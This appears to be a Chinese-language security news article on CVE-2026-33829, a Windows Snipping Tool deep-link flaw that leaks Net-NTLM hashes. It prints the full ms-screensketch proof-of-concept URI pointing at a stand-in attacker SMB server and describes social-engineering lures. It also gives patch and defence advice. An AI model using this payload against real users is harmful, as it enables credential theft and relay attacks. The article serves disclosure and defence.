网络安全研究人员已公开针对微软截图工具Snipping Tool新漏洞的概念验证PoC利用代码攻击者可通过诱导用户访问恶意网页悄无声息地窃取其Net-NTLM凭证哈希值。该漏洞编号为CVE-2026-33829源于Windows截图工具处理ms-screensketch协议架构深度链接URI注册时的缺陷。受影响版本的应用程序会注册该深度链接该链接接受filePath参数。漏洞利用原理由于缺乏有效的输入验证攻击者可提供指向远程攻击者控制SMB服务器的UNC路径强制建立经过身份验证的SMB连接并在此过程中捕获受害者的Net-NTLM哈希。Black Arrow安全团队发现并报告了该漏洞在公开前已与微软协调披露。Windows截图工具PoC详解利用该漏洞所需技术门槛极低。攻击者仅需托管恶意URL或能自动触发深度链接的HTML页面并诱使目标访问即可。Black Arrow Security提供的PoC演示了通过浏览器触发单一URI实现攻击ms-screensketch:edit?filePath\\attacker-smb-server\file.pngisTemporaryfalsesavedtruesourceToast当受害者打开此链接时截图工具会启动并静默尝试通过SMB加载远程资源。在此连接尝试过程中Windows会自动将用户的Net-NTLM认证响应发送至攻击者服务器暴露的凭证可被离线破解或用于针对内部网络资源的NTLM中继攻击。CVE-2026-33829的特别危险之处在于其天然适合社会工程攻击。由于截图工具在利用过程中确实会打开攻击在视觉上与可信借口完全吻合例如要求员工裁剪企业壁纸、编辑工牌照片或查看HR文档。攻击者可注册类似snip.example.com的域名提供看似正常的图片URL在后台静默传递恶意深度链接有效载荷。受害者不会察觉任何异常——截图工具如预期般打开而NTLM认证在后台透明进行。补丁发布与时间线微软已在2026年4月14日的补丁星期二安全更新中修复该漏洞。披露时间线如下2026年3月23日——漏洞报告至微软2026年4月14日——微软发布安全补丁2026年4月14日——协调发布公开公告及PoC运行受影响版本Windows截图工具的企业及个人用户应立即安装2026年4月14日的安全更新。安全团队还应监控内部网络中是否存在指向外部或未知主机的异常出站SMB连接端口445这可能是活跃攻击尝试的迹象。无论补丁状态如何在网络边界阻止出站SMB流量仍是有效的防御措施。